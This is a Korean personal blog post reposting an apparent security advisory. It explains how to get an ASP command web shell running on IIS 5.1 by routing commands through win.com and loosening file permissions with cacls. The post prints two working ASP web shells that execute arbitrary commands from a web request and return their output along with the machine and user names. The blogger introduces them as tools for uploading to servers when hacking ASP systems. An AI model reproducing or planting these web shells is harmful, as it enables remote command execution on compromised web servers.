close

Trust Me!! Trust You!!


  • Blog
  • Local Log
  • Tag Cloud
  • Key Log
  • Guestbook
  • RSS Feed
  • Write a Post
  • Admin

혹시 블로그 스킨이 깨져 보이시나요? 최신버전의 Internet Explorer(Windows용), Opera, Firefox를 사용해보세요.

XP의 PWS 혹은 2003에서 돌아가는 ASP시스템 해킹용 WebShell

웹 프로그래밍
2007/04/06 01:46
 
Windows 2000에 ASP를 사용하는 웹시스템 해킹시 서버에 업로드하여
(가능하다면 :) ) 많이 사용했던 WebShell들이 IIS5.1 즉 XP의 PWS 혹은 2003의 IIS에선 실행이 안됐던 문제가 해결된(?) ASP소스 라는군요.
========================================================================
'ASP Cmd Shell On IIS 5.1
'brett.moore (at) security-assessment (dot) com [email concealed]
========================================================================

ASP shells have been around since the dawn of time. On IIS 5.0 and prior
it
was simple to create a 'command prompt shell' using code similar to;

<%
Set oS = Server.CreateObject("WSCRIPT.SHELL")
output = oS.exec("cmd.exe > /c " & request("command")).stdout.readall
response.write output
%>

Permissions changes in IIS 5.1 prevented this method from working as
execution access was revoked to the IUSR_Machine user.

During one boring afternoon it was decided to find a way around this,
and
what we found was 'slightly' interesting.

When IIS checks to see if an executable has 'execute' rights it is
checking against IUSR_Machine. If execute rights are granted then the
new process is created, under the IWAM_Machine account.

Thus all that was needed was an executable that could be run by
IUSR_Machine
and would then spawn an instance of cmd.exe.

We set about seeing what executables could be run by IUSR_Machine. It
turns
out that execution access has been revoked to all files with the .exe
extension. We did however locate several .com files that could still be
executed. One in particular 'win.com' takes a command line as a
parameter
and will execute it.

Because of the 'double spawning' we can not make use of .stdout.readall,
and
need to revert to outputting to a file, and reading it back in.

Due to the process executing under a different account than that of the
ASP
processor, we need to jump through a couple of hoops.
* The folder that we use must be WRITEABLE by IWAM_Machine
* The folder that we use must be READABLE by IUSR_Machine
* We need to alter file permissions to allow IUSR_Machine access to read

the file created by IWAM_Machine

The accesschk tool from sysinternals, can easily identify a valid
location.
Our testings came up with c:\windows\pchealth\ERRORREP\QHEADLES
IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and
therefore
this technique will not work on that platform.

------------------------------------------------------------------------

----
<%
Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")

If (szCMD <> "") Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
' Here we do the command
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
"""",0,True)
response.write szTF
' Change perms
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
everyone:F",0,True)
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="C" size=70 value="<%= szCMD %>">
<input type=submit value="Run"></FORM><PRE>
Machine: <%=oSNet.ComputerName%><BR>
Username: <%=oSNet.UserName%><br>
<%
If (IsObject(oF)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If
%>
이올린에 북마크하기
No received trackback. / Comment 7

Trackback Address :: http://viper150.cafe24.com/trackback/11

You can also say.

Prev 1 ... 285 286 287 288 289 290 291 292 293 ... 298 Next
블로그 이미지
이것저것 불펌금지도 퍼다가 담습니다. 외부에 비공개된 페이지 입니다. By. 어른왕자

카테고리

  • 전체 (298)
    • 사는 이야기 (115)
    • 웹 프로그래밍 (102)
    • App 프로그래밍 (22)
    • IT 뉴스&기타 (22)
    • 박한별 (4)
    • 역사&기타지식 (9)

태그목록

  • 사회초년생
  • IIS
  • 고전팝
  • 우리
  • redirect
  • ligagg
  • Jdk
  • Javase
  • 의자
  • 양제
  • 최적화
  • 허성도
  • CentOS
  • base target
  • 얻은것
  • java
  • NWS
  • 직장의신
  • 1.6
  • BOA
  • 소녀시대
  • 개통이력
  • vga성능
  • Dialog
  • XSS
  • 탬버린선생
  • eclipse
  • 공무원
  • plugin
  • 게임의자

최근에 올라온 글

  • 보험사의 조정신청 대응방법.
  • 어느 천재의 앞선 시선.
  • [병맛더빙] 누구게..... (1)
  • 韓경제 `회색 코뿔소` 상황...
  • SVN Connector 설치 URL.
  • 군대를 가지 않는 서울대생.
  • “운은 하늘의 귀여움 받는...
  • 목장에서 알바하다가 캐스...
  • [펌]믿고 거르는 관상.
  • 하루에 1세트씩 하면 좋다...

최근에 달린 댓글

  • <p><img src="https://i.imgur... 브레드 01/22
  • <p><img src="https://i.imgur... 브레드 01/22
  • <p><img src="https://i.imgur... 브레드 01/22
  • <p><img src="https://i.imgur... 브레드 01/22
  • <p><img src="https://i.imgur... 브레드 01/22

최근에 받은 트랙백

  • công ty may đồng phục. công ty may đồng phục 01/08
  • Israelnightclub`s recent blo... Israelnightclub`s recent blo.. 01/06
  • Suggested Browsing. Suggested Browsing 01/06
  • similar site. similar site 01/06
  • לאתר הבית שלנו. לאתר הבית שלנו 01/06

글 보관함

  • 2019/03 (1)
  • 2018/12 (1)
  • 2018/09 (1)
  • 2018/08 (1)
  • 2018/02 (1)

달력

«   2021/01   »
일 월 화 수 목 금 토
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31            

링크

  • Total : 261967
  • Today : 0
  • Yesterday : 42
Tattertools
Eolin
rss

어른왕자's blog is powered byTattertools1.1.2.2 : Animato